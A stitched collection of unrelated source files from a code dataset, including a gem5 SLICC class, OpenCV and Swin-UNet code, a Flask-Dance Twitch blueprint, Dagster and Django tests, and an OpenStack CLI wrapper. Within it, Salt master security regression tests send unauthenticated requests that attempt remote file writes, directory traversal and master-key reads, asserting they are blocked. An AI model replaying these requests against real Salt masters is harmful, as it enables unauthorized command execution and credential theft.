StallAndWaitStatementAST(StatementAST): def __init__(self, slicc, in_port, address): super(StatementAST, self).__init__(slicc) self.in_port = in_port self.address = address def __repr__(self): return "[StallAndWaitStatementAst: %r]" % self.in_port def generate(self, code, return_type, **kwargs): self.in_port.assertType("InPort") self.address.assertType("Addr") in_port_code = self.in_port.var.code address_code = self.address.var.code code(''' stallBuffer(&($in_port_code), $address_code); $in_port_code.stallMessage($address_code, clockEdge()); ''')
the-stack_106_24386
import cv2 bitwise1 = cv2.imread("bitwise_1.png") bitwise2 = cv2.imread("bitwise_2.png") #bit_and = cv2.bitwise_and(bitwise1, bitwise2) #bit_or = cv2.bitwise_or(bitwise1, bitwise2) #bit_xor = cv2.bitwise_xor(bitwise1, bitwise2) bit_not = cv2.bitwise_not(bitwise1, bitwise2) #cv2.imshow("and", bit_and) #cv2.imshow("or", bit_or) #cv2.imshow("xor", bit_xor) cv2.imshow("not", bit_not) cv2.imshow("1", bitwise1) cv2.imshow("2", bitwise2) cv2.waitKey(0) cv2.destroyAllWindows()
the-stack_106_24389
import torch import torch.nn as nn import torch.utils.checkpoint as checkpoint from einops import rearrange from timm.models.layers import DropPath, to_2tuple, trunc_normal_ from ..utils.no_swin_unet_v2_utils import * from ..builder import BACKBONES from mmseg.utils import get_root_logger from mmcv_custom import load_checkpoint import copy import logging import math from os.path import join as pjoin @BACKBONES.register_module() class NoSwinUNetV2(nn.Module): def __init__(self, pretrain_img_size=224, patch_size=4, in_chans=3, num_classes=1000, embed_dim=96, depths=[2, 2, 2, 2], depths_decoder=[1, 2, 2, 2], num_heads=[3, 6, 12, 24], window_size=7, mlp_ratio=4., qkv_bias=True, qk_scale=None, drop_rate=0., attn_drop_rate=0., drop_path_rate=0.1, norm_layer=nn.LayerNorm, ape=False, patch_norm=True, use_checkpoint=False, final_upsample="expand_first", **kwargs): super().__init__() self.num_classes = num_classes # self.zero_head = zero_head # self.config = config self.swin_unet = SwinTransformerSys(pretrain_img_size=pretrain_img_size, patch_size=patch_size, in_chans=in_chans, num_classes=self.num_classes, embed_dim=embed_dim, depths=depths, depths_decoder=depths_decoder, num_heads=num_heads, window_size=window_size, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_rate=drop_path_rate, norm_layer=norm_layer, ape=ape, patch_norm=patch_norm, use_checkpoint=use_checkpoint, final_upsample=final_upsample) def forward(self, x): if x.size()[1] == 1: x = x.repeat(1,3,1,1) logits = self.swin_unet(x) return logits def init_weights(self, pretrained=None): pretrained_path=pretrained if pretrained_path is not None: print("pretrained_path:{}".format(pretrained_path)) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') pretrained_dict = torch.load(pretrained_path, map_location=device) if "model" not in pretrained_dict: print("---start load pretrained modle by splitting---") pretrained_dict = {k[17:]:v for k,v in pretrained_dict.items()} for k in list(pretrained_dict.keys()): if "output" in k: print("delete key:{}".format(k)) del pretrained_dict[k] msg = self.swin_unet.load_state_dict(pretrained_dict,strict=False) # print(msg) return pretrained_dict = pretrained_dict['model'] print("---start load pretrained modle of swin encoder---") model_dict = self.swin_unet.state_dict() full_dict = copy.deepcopy(pretrained_dict) for k, v in pretrained_dict.items(): if "layers." in k: current_layer_num = 3-int(k[7:8]) current_k = "layers_up." + str(current_layer_num) + k[8:] full_dict.update({current_k:v}) for k in list(full_dict.keys()): if k in model_dict: if full_dict[k].shape != model_dict[k].shape: print("delete:{};shape pretrain:{};shape model:{}".format(k,v.shape,model_dict[k].shape)) del full_dict[k] msg = self.swin_unet.load_state_dict(full_dict, strict=False) # print(msg) else: print("none pretrain")
the-stack_106_24390
"""Blueprint for connecting to Twitch API.""" from flask_dance.consumer import OAuth2ConsumerBlueprint from flask_dance.consumer.requests import OAuth2Session from functools import partial from flask.globals import LocalProxy, _lookup_app_object import os from flask import _app_ctx_stack as stack __maintainer__ = "Kerry Hatcher <[email protected]>" class ClientIdHeaderOAuth2Session(OAuth2Session): """ https://blog.twitch.tv/en/2016/05/05/client-id-required-for-kraken-api-calls-afbb8e95f843/ """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.headers["client-id"] = self.client_id def make_twitch_blueprint( client_id=None, client_secret=None, scope=None, redirect_url=None, redirect_to=None, login_url=None, authorized_url=None, session_class=ClientIdHeaderOAuth2Session, storage=None, ): """Make a blueprint for authenticating with Twitch using OAuth 2. This requires a client ID and client secret from Twitch. You should either pass them to this constructor, or make sure that your Flask application config defines them, using the variables :envvar:`TWITCH_OAUTH_CLIENT_ID` and :envvar:`TWITCH_OAUTH_CLIENT_SECRET`. Args: client_id (str): The client ID for your application on Twitch. Defaults to app config "TWITCH_OAUTH_CLIENT_ID". client_secret (str): The client Secret for your application on Twitch. Defaults to app config "TWITCH_OAUTH_CLIENT_SECRET". scope (list, optional): Comma-separated list of scopes for the OAuth token. Defaults to None. redirect_url (str): the URL to redirect to after the authentication dance is complete redirect_to (str): if ``redirect_url`` is not defined, the name of the view to redirect to after the authentication dance is complete. The actual URL will be determined by :func:`flask.url_for` login_url (str, optional): the URL path for the ``login`` view. Defaults to ``/twitch`` authorized_url (str, optional): the URL path for the ``authorized`` view. Defaults to ``/twitch/authorized``. session_class (class, optional): The class to use for creating a Requests session. Defaults to :class:`~flask_dance.contrib.twitch.ClientIdHeaderOAuth2Session`. storage: A token storage class, or an instance of a token storage class, to use for this blueprint. Defaults to :class:`~flask_dance.consumer.storage.session.SessionStorage`. Returns: :class:`~flask_dance.consumer.OAuth2ConsumerBlueprint` A :ref:`blueprint <flask:blueprints>` to attach to your Flask app. """ twitch_bp = OAuth2ConsumerBlueprint( "twitch", __name__, client_id=client_id, client_secret=client_secret, scope=scope, base_url="https://api.twitch.tv/helix/", authorization_url="https://id.twitch.tv/oauth2/authorize", token_url="https://id.twitch.tv/oauth2/token", token_url_params={"include_client_id": True}, redirect_url=redirect_url, redirect_to=redirect_to, login_url=login_url, authorized_url=authorized_url, session_class=session_class, storage=storage, ) twitch_bp.from_config["client_id"] = "TWITCH_OAUTH_CLIENT_ID" twitch_bp.from_config["client_secret"] = "TWITCH_OAUTH_CLIENT_SECRET" # TODO: The key won't auto renew. See https://github.com/singingwolfboy/flask-dance/issues/35 # I think this will work but needs a test. twitch_bp.auto_refresh_url = twitch_bp.token_url twitch_bp.auto_refresh_kwargs = { "client_id": twitch_bp.client_id, "client_secret": twitch_bp.client_secret, } @twitch_bp.before_app_request def set_applocal_session(): ctx = stack.top ctx.twitch_oauth = twitch_bp.session return twitch_bp twitch = LocalProxy(partial(_lookup_app_object, "twitch_oauth"))
the-stack_106_24391
import pytest from dagster import ( DagsterInstance, Int, Output, OutputDefinition, check, composite_solid, execute_pipeline, lambda_solid, pipeline, solid, ) from dagster.core.definitions.pipeline_base import InMemoryPipeline from dagster.core.errors import ( DagsterInvalidConfigError, DagsterInvariantViolationError, DagsterUnknownStepStateError, ) from dagster.core.execution.api import create_execution_plan, execute_plan from dagster.core.execution.plan.outputs import StepOutputHandle from dagster.core.execution.plan.plan import should_skip_step from dagster.core.execution.retries import RetryMode from dagster.core.storage.pipeline_run import PipelineRun from dagster.core.utils import make_new_run_id def define_diamond_pipeline(): @lambda_solid def return_two(): return 2 @solid def add_three(num): return num + 3 @solid def mult_three(num): return num * 3 @solid def adder(left, right): return left + right @pipeline def diamond_pipeline(): two = return_two() adder(left=add_three(two), right=mult_three(two)) return diamond_pipeline def test_topological_sort(): plan = create_execution_plan(define_diamond_pipeline()) levels = plan.get_steps_to_execute_by_level() assert len(levels) == 3 assert [step.key for step in levels[0]] == ["return_two"] assert [step.key for step in levels[1]] == ["add_three", "mult_three"] assert [step.key for step in levels[2]] == ["adder"] def test_create_execution_plan_with_bad_inputs(): with pytest.raises(DagsterInvalidConfigError): create_execution_plan( define_diamond_pipeline(), run_config={"solids": {"add_three": {"inputs": {"num": 3}}}}, ) def test_active_execution_plan(): plan = create_execution_plan(define_diamond_pipeline()) with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_3.key) active_execution.mark_step_produced_output(StepOutputHandle(step_3.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress assert not active_execution.is_complete active_execution.mark_success(step_4.key) assert active_execution.is_complete def test_failing_execution_plan(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # uh oh failure active_execution.mark_failed(step_3.key) active_execution.mark_step_produced_output(StepOutputHandle(step_3.key, "result")) # cant progres to 4th step steps = active_execution.get_steps_to_execute() assert len(steps) == 0 assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" active_execution.mark_abandoned(step_4.key) assert active_execution.is_complete def test_retries_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.ENABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 assert steps[0].key == "return_two" active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 1 assert steps[0].key == "return_two" active_execution.mark_success(step_1.key) active_execution.mark_step_produced_output(StepOutputHandle(step_1.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 2 step_2 = steps[0] step_3 = steps[1] assert step_2.key == "add_three" assert step_3.key == "mult_three" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_success(step_2.key) active_execution.mark_step_produced_output(StepOutputHandle(step_2.key, "result")) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # uh oh failure active_execution.mark_failed(step_3.key) # cant progres to 4th step steps = active_execution.get_steps_to_execute() assert len(steps) == 0 assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() assert len(steps) == 1 step_4 = steps[0] assert step_4.key == "adder" active_execution.mark_abandoned(step_4.key) assert active_execution.is_complete def test_retries_disabled_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with pytest.raises(check.CheckError): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress # raises active_execution.mark_up_for_retry(step_1.key) def test_retries_deferred_active_execution(): pipeline_def = define_diamond_pipeline() plan = create_execution_plan(pipeline_def) with plan.start(retry_mode=(RetryMode.DEFERRED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] assert step_1.key == "return_two" steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress active_execution.mark_up_for_retry(step_1.key) steps = active_execution.get_steps_to_execute() assert len(steps) == 0 # cant progress, retries are deferred assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() # skip split of diamond assert len(steps) == 2 _ = [active_execution.mark_abandoned(step.key) for step in steps] assert not active_execution.is_complete steps = active_execution.get_steps_to_abandon() # skip end of diamond assert len(steps) == 1 active_execution.mark_abandoned(steps[0].key) assert active_execution.is_complete def test_priorities(): @solid(tags={"priority": 5}) def pri_5(_): pass @solid(tags={"priority": 4}) def pri_4(_): pass @solid(tags={"priority": 3}) def pri_3(_): pass @solid(tags={"priority": 2}) def pri_2(_): pass @solid(tags={"priority": -1}) def pri_neg_1(_): pass @solid def pri_none(_): pass @pipeline def priorities(): pri_neg_1() pri_3() pri_2() pri_none() pri_5() pri_4() sort_key_fn = lambda step: int(step.tags.get("priority", 0)) * -1 plan = create_execution_plan(priorities) with plan.start(RetryMode.DISABLED, sort_key_fn) as active_execution: steps = active_execution.get_steps_to_execute() assert steps[0].key == "pri_5" assert steps[1].key == "pri_4" assert steps[2].key == "pri_3" assert steps[3].key == "pri_2" assert steps[4].key == "pri_none" assert steps[5].key == "pri_neg_1" _ = [active_execution.mark_skipped(step.key) for step in steps] def test_executor_not_created_for_execute_plan(): instance = DagsterInstance.ephemeral() pipe = define_diamond_pipeline() plan = create_execution_plan(pipe) pipeline_run = instance.create_run_for_pipeline(pipe, plan) results = execute_plan( plan, InMemoryPipeline(pipe), instance, pipeline_run, run_config={"execution": {"multiprocess": {}}}, ) for result in results: assert not result.is_failure def test_incomplete_execution_plan(): plan = create_execution_plan(define_diamond_pipeline()) with pytest.raises( DagsterInvariantViolationError, match="Execution of pipeline finished without completing the execution plan.", ): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] active_execution.mark_success(step_1.key) # exit early def test_lost_steps(): plan = create_execution_plan(define_diamond_pipeline()) # run to completion - but step was in unknown state so exception thrown with pytest.raises(DagsterUnknownStepStateError): with plan.start(retry_mode=(RetryMode.DISABLED)) as active_execution: steps = active_execution.get_steps_to_execute() assert len(steps) == 1 step_1 = steps[0] # called by verify_complete when success / fail event not observed active_execution.mark_unknown_state(step_1.key) # failure assumed for start step - so rest should skip steps_to_abandon = active_execution.get_steps_to_abandon() while steps_to_abandon: _ = [active_execution.mark_abandoned(step.key) for step in steps_to_abandon] steps_to_abandon = active_execution.get_steps_to_abandon() assert active_execution.is_complete def test_fan_out_should_skip_step(): @solid( output_defs=[ OutputDefinition(Int, "out_1", is_required=False), OutputDefinition(Int, "out_2", is_required=False), OutputDefinition(Int, "out_3", is_required=False), ] ) def foo(_): yield Output(1, "out_1") @solid def bar(_, input_arg): return input_arg @pipeline def optional_outputs(): foo_res = foo() # pylint: disable=no-member bar.alias("bar_1")(input_arg=foo_res.out_1) bar.alias("bar_2")(input_arg=foo_res.out_2) bar.alias("bar_3")(input_arg=foo_res.out_3) instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="optional_outputs", run_id=make_new_run_id()) execute_plan( create_execution_plan(optional_outputs, step_keys_to_execute=["foo"]), InMemoryPipeline(optional_outputs), instance, pipeline_run, ) assert not should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_1"]), instance, pipeline_run.run_id, ) assert should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_2"]), instance, pipeline_run.run_id, ) assert should_skip_step( create_execution_plan(optional_outputs, step_keys_to_execute=["bar_3"]), instance, pipeline_run.run_id, ) def test_fan_in_should_skip_step(): @lambda_solid def one(): return 1 @solid(output_defs=[OutputDefinition(is_required=False)]) def skip(_): return yield # pylint: disable=unreachable @solid def fan_in(_context, items): return items @composite_solid(output_defs=[OutputDefinition(is_required=False)]) def composite_all_upstream_skip(): return fan_in([skip(), skip()]) @composite_solid(output_defs=[OutputDefinition(is_required=False)]) def composite_one_upstream_skip(): return fan_in([one(), skip()]) @pipeline def optional_outputs_composite(): composite_all_upstream_skip() composite_one_upstream_skip() instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="optional_outputs_composite", run_id=make_new_run_id()) execute_plan( create_execution_plan( optional_outputs_composite, step_keys_to_execute=[ "composite_all_upstream_skip.skip", "composite_all_upstream_skip.skip_2", ], ), InMemoryPipeline(optional_outputs_composite), instance, pipeline_run, ) # skip when all the step's sources weren't yield assert should_skip_step( create_execution_plan( optional_outputs_composite, step_keys_to_execute=["composite_all_upstream_skip.fan_in"], ), instance, pipeline_run.run_id, ) execute_plan( create_execution_plan( optional_outputs_composite, step_keys_to_execute=[ "composite_one_upstream_skip.one", "composite_one_upstream_skip.skip", ], ), InMemoryPipeline(optional_outputs_composite), instance, pipeline_run, ) # do not skip when some of the sources exist assert not should_skip_step( create_execution_plan( optional_outputs_composite, step_keys_to_execute=["composite_one_upstream_skip.fan_in"], ), instance, pipeline_run.run_id, ) def test_configured_input_should_skip_step(): called = {} @solid(output_defs=[OutputDefinition(is_required=False)]) def one(_): yield Output(1) @solid def solid_should_not_skip(_, input_one, input_two): # pylint: disable=unused-argument called["yup"] = True @pipeline def my_pipeline(): solid_should_not_skip(one()) run_config = {"solids": {"solid_should_not_skip": {"inputs": {"input_two": {"value": "2"}}}}} execute_pipeline(my_pipeline, run_config=run_config) assert called.get("yup") # ensure should_skip_step behave the same as execute_pipeline instance = DagsterInstance.ephemeral() pipeline_run = PipelineRun(pipeline_name="my_pipeline", run_id=make_new_run_id()) execute_plan( create_execution_plan( my_pipeline, step_keys_to_execute=["one"], run_config=run_config, ), InMemoryPipeline(my_pipeline), instance, pipeline_run, run_config=run_config, ) assert not should_skip_step( create_execution_plan( my_pipeline, step_keys_to_execute=["solid_should_not_skip"], run_config=run_config, ), instance, pipeline_run.run_id, )
the-stack_106_24392
import logging import os import shutil import tempfile import time import salt.master import salt.transport.client import salt.utils.files import salt.utils.platform import salt.utils.user from tests.support.case import TestCase from tests.support.mixins import AdaptedConfigurationTestCaseMixin from tests.support.runtests import RUNTIME_VARS log = logging.getLogger(__name__) class ConfigMixin: @classmethod def setUpClass(cls): cls.master_config = AdaptedConfigurationTestCaseMixin.get_config("master") cls.minion_config = AdaptedConfigurationTestCaseMixin.get_temp_config( "minion", id="root", transport=cls.master_config["transport"], auth_tries=1, auth_timeout=5, master_ip="127.0.0.1", master_port=cls.master_config["ret_port"], master_uri="tcp://127.0.0.1:{}".format(cls.master_config["ret_port"]), ) if not salt.utils.platform.is_windows(): user = cls.master_config["user"] else: user = salt.utils.user.get_specific_user().replace("\\", "_") if user.startswith("sudo_"): user = user.split("sudo_")[-1] cls.user = user cls.keyfile = ".{}_key".format(cls.user) cls.keypath = os.path.join(cls.master_config["cachedir"], cls.keyfile) with salt.utils.files.fopen(cls.keypath) as keyfd: cls.key = keyfd.read() @classmethod def tearDownClass(cls): del cls.master_config del cls.minion_config del cls.key del cls.keyfile del cls.keypath class ClearFuncsAuthTestCase(ConfigMixin, TestCase): def test_auth_info_not_allowed(self): assert hasattr(salt.master.ClearFuncs, "_prep_auth_info") clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = {"cmd": "_prep_auth_info"} rets = clear_channel.send(msg, timeout=15) ret_key = None for ret in rets: try: ret_key = ret[self.user] break except (TypeError, KeyError): pass assert ret_key != self.key, "Able to retrieve user key" class ClearFuncsPubTestCase(ConfigMixin, TestCase): def setUp(self): tempdir = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP) self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True) self.tmpfile = os.path.join(tempdir, "evil_file") def tearDown(self): self.tmpfile = None def test_pub_not_allowed(self): assert hasattr(salt.master.ClearFuncs, "_send_pub") assert not os.path.exists(self.tmpfile) clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) jid = "202003100000000001" msg = { "cmd": "_send_pub", "fun": "file.write", "jid": jid, "arg": [self.tmpfile, "evil contents"], "kwargs": {"show_jid": False, "show_timeout": False}, "ret": "", "tgt": "minion", "tgt_type": "glob", "user": "root", } with salt.utils.event.get_event( "master", sock_dir=self.master_config["sock_dir"], transport=self.master_config["transport"], opts=self.master_config, ) as eventbus: ret = clear_channel.send(msg, timeout=15) if salt.utils.platform.is_windows(): time.sleep(30) timeout = 30 else: timeout = 5 ret_evt = None start = time.time() while time.time() - start <= timeout: raw = eventbus.get_event(timeout, auto_reconnect=True) if raw and "jid" in raw and raw["jid"] == jid: ret_evt = raw break assert not os.path.exists(self.tmpfile), "Evil file created" class ClearFuncsConfigTest(ConfigMixin, TestCase): def setUp(self): self.evil_file_path = os.path.join( os.path.dirname(self.master_config["conf_file"]), "evil.conf" ) def tearDown(self): try: os.remove(self.evil_file_path) except OSError: pass self.evil_file_path = None def test_clearfuncs_config(self): clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "config.update_config", "file_name": "../evil", "yaml_contents": "win", } ret = clear_channel.send(msg, timeout=5) assert not os.path.exists( self.evil_file_path ), "Wrote file via directory traversal" assert ret["data"]["return"] == "Invalid path" class ClearFuncsFileRoots(ConfigMixin, TestCase): def setUp(self): self.file_roots_dir = self.master_config["file_roots"]["base"][0] self.target_dir = os.path.dirname(self.file_roots_dir) def tearDown(self): try: os.remove(os.path.join(self.target_dir, "pwn.txt")) except OSError: pass def test_fileroots_write(self): clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "file_roots.write", "data": "win", "path": os.path.join("..", "pwn.txt"), "saltenv": "base", } ret = clear_channel.send(msg, timeout=5) assert not os.path.exists( os.path.join(self.target_dir, "pwn.txt") ), "Wrote file via directory traversal" def test_fileroots_read(self): readpath = os.path.relpath(self.keypath, self.file_roots_dir) relative_key_path = os.path.join(self.file_roots_dir, readpath) log.debug("Master root_dir: %s", self.master_config["root_dir"]) log.debug("File Root: %s", self.file_roots_dir) log.debug("Key Path: %s", self.keypath) log.debug("Read Path: %s", readpath) log.debug("Relative Key Path: %s", relative_key_path) log.debug("Absolute Read Path: %s", os.path.abspath(relative_key_path)) # If this asserion fails the test may need to be re-written assert os.path.abspath(relative_key_path) == self.keypath clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "file_roots.read", "path": readpath, "saltenv": "base", } ret = clear_channel.send(msg, timeout=5) try: # When vulnerable this assertion will fail. assert ( list(ret["data"]["return"][0].items())[0][1] != self.key ), "Read file via directory traversal" except IndexError: pass # If the vulnerability is fixed, no data will be returned. assert ret["data"]["return"] == [] class ClearFuncsTokenTest(ConfigMixin, TestCase): def test_token(self): tokensdir = os.path.join(self.master_config["cachedir"], "tokens") assert os.path.exists(tokensdir), tokensdir clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "arg": [], "cmd": "get_token", "token": os.path.join("..", "minions", "minion", "data.p"), } ret = clear_channel.send(msg, timeout=5) assert "pillar" not in ret, "Read minion data via directory traversal"
the-stack_106_24393
import os dir_names = ["butterfly", "sisl", "magent", "mpe", "atari"] had_error = False for name in dir_names: root_dir = os.path.join("pettingzoo", name) for _dir, subdirs, files in os.walk(root_dir): for file in files: if file.endswith(".py"): with open(os.path.join(_dir, file)) as f: for line in f: if line.lstrip().startswith("print"): print(f"File: {os.path.join(_dir, file)} has a print statement. Please remove it.") had_error = True break exit(-1 if had_error else 0)
the-stack_106_24395
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for working with OpenStack Cloud resources.""" from collections import OrderedDict from absl import flags from perfkitbenchmarker import vm_util import six FLAGS = flags.FLAGS class OpenStackCLICommand(object): """An openstack cli command. Attributes: args: list of strings. Positional args to pass to openstack, typically specifying an operation to perform (e.g. ['image', 'list'] to list available images). flags: OrderedDict mapping flag name string to flag value. Flags to pass to openstack cli (e.g. {'os-compute-api-version': '2'}). If a provided value is True, the flag is passed to openstack cli without a value. If a provided value is a list, the flag is passed to openstack cli multiple times, once with each value in the list. additional_flags: list of strings. Additional flags to append unmodified to the end of the openstack cli command. """ def __init__(self, resource, *args): """Initializes an OpenStackCLICommand with the provided args and common flags. Args: resource: An OpenStack resource of type BaseResource. *args: sequence of strings. Positional args to pass to openstack cli, typically specifying an operation to perform (e.g. ['image', 'list'] to list available images). """ self.args = list(args) self.flags = OrderedDict() self.additional_flags = [] self._AddCommonFlags(resource) def __repr__(self): return '{0}({1})'.format(type(self).__name__, ' '.join(self._GetCommand())) def _GetCommand(self): """Generates the openstack cli command. Returns: list of strings. When joined by spaces, forms the openstack cli command. """ cmd = [FLAGS.openstack_cli_path] cmd.extend(self.args) for flag_name, values in six.iteritems(self.flags): flag_name_str = '--%s' % flag_name if values is True: cmd.append(flag_name_str) else: values_iterable = values if isinstance(values, list) else [values] for value in values_iterable: cmd.append(flag_name_str) cmd.append(str(value)) cmd.extend(self.additional_flags) return cmd def Issue(self, **kwargs): """Tries running the openstack cli command once. Args: **kwargs: Keyword arguments to forward to vm_util.IssueCommand when issuing the openstack cli command. Returns: A tuple of stdout, stderr, and retcode from running the openstack command. """ if 'raise_on_failure' not in kwargs: kwargs['raise_on_failure'] = False return vm_util.IssueCommand(self._GetCommand(), **kwargs) def IssueRetryable(self, **kwargs): """Tries running the openstack cli command until it succeeds or times out. Args: **kwargs: Keyword arguments to forward to vm_util.IssueRetryableCommand when issuing the openstack cli command. Returns: (stdout, stderr) pair of strings from running the openstack command. """ return vm_util.IssueRetryableCommand(self._GetCommand(), **kwargs) def _AddCommonFlags(self, resource): """Adds common flags to the command. Adds common openstack flags derived from the PKB flags and provided resource. Args: resource: An OpenStack resource of type BaseResource. """ self.flags['format'] = 'json' self.additional_flags.extend(FLAGS.openstack_additional_flags or ())
the-stack_106_24396
from __future__ import unicode_literals from datetime import datetime from operator import attrgetter from django.core.exceptions import FieldError from django.test import TestCase, skipUnlessDBFeature from .models import Author, Article, Tag, Game, Season, Player class LookupTests(TestCase): def setUp(self): # Create a few Authors. self.au1 = Author(name='Author 1') self.au1.save() self.au2 = Author(name='Author 2') self.au2.save() # Create a couple of Articles. self.a1 = Article(headline='Article 1', pub_date=datetime(2005, 7, 26), author=self.au1) self.a1.save() self.a2 = Article(headline='Article 2', pub_date=datetime(2005, 7, 27), author=self.au1) self.a2.save() self.a3 = Article(headline='Article 3', pub_date=datetime(2005, 7, 27), author=self.au1) self.a3.save() self.a4 = Article(headline='Article 4', pub_date=datetime(2005, 7, 28), author=self.au1) self.a4.save() self.a5 = Article(headline='Article 5', pub_date=datetime(2005, 8, 1, 9, 0), author=self.au2) self.a5.save() self.a6 = Article(headline='Article 6', pub_date=datetime(2005, 8, 1, 8, 0), author=self.au2) self.a6.save() self.a7 = Article(headline='Article 7', pub_date=datetime(2005, 7, 27), author=self.au2) self.a7.save() # Create a few Tags. self.t1 = Tag(name='Tag 1') self.t1.save() self.t1.articles.add(self.a1, self.a2, self.a3) self.t2 = Tag(name='Tag 2') self.t2.save() self.t2.articles.add(self.a3, self.a4, self.a5) self.t3 = Tag(name='Tag 3') self.t3.save() self.t3.articles.add(self.a5, self.a6, self.a7) def test_exists(self): # We can use .exists() to check that there are some self.assertTrue(Article.objects.exists()) for a in Article.objects.all(): a.delete() # There should be none now! self.assertFalse(Article.objects.exists()) def test_lookup_int_as_str(self): # Integer value can be queried using string self.assertQuerysetEqual(Article.objects.filter(id__iexact=str(self.a1.id)), ['<Article: Article 1>']) @skipUnlessDBFeature('supports_date_lookup_using_string') def test_lookup_date_as_str(self): # A date lookup can be performed using a string search self.assertQuerysetEqual(Article.objects.filter(pub_date__startswith='2005'), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) def test_iterator(self): # Each QuerySet gets iterator(), which is a generator that "lazily" # returns results using database-level iteration. self.assertQuerysetEqual(Article.objects.iterator(), [ 'Article 5', 'Article 6', 'Article 4', 'Article 2', 'Article 3', 'Article 7', 'Article 1', ], transform=attrgetter('headline')) # iterator() can be used on any QuerySet. self.assertQuerysetEqual( Article.objects.filter(headline__endswith='4').iterator(), ['Article 4'], transform=attrgetter('headline')) def test_count(self): # count() returns the number of objects matching search criteria. self.assertEqual(Article.objects.count(), 7) self.assertEqual(Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).count(), 3) self.assertEqual(Article.objects.filter(headline__startswith='Blah blah').count(), 0) # count() should respect sliced query sets. articles = Article.objects.all() self.assertEqual(articles.count(), 7) self.assertEqual(articles[:4].count(), 4) self.assertEqual(articles[1:100].count(), 6) self.assertEqual(articles[10:100].count(), 0) # Date and date/time lookups can also be done with strings. self.assertEqual(Article.objects.filter(pub_date__exact='2005-07-27 00:00:00').count(), 3) def test_in_bulk(self): # in_bulk() 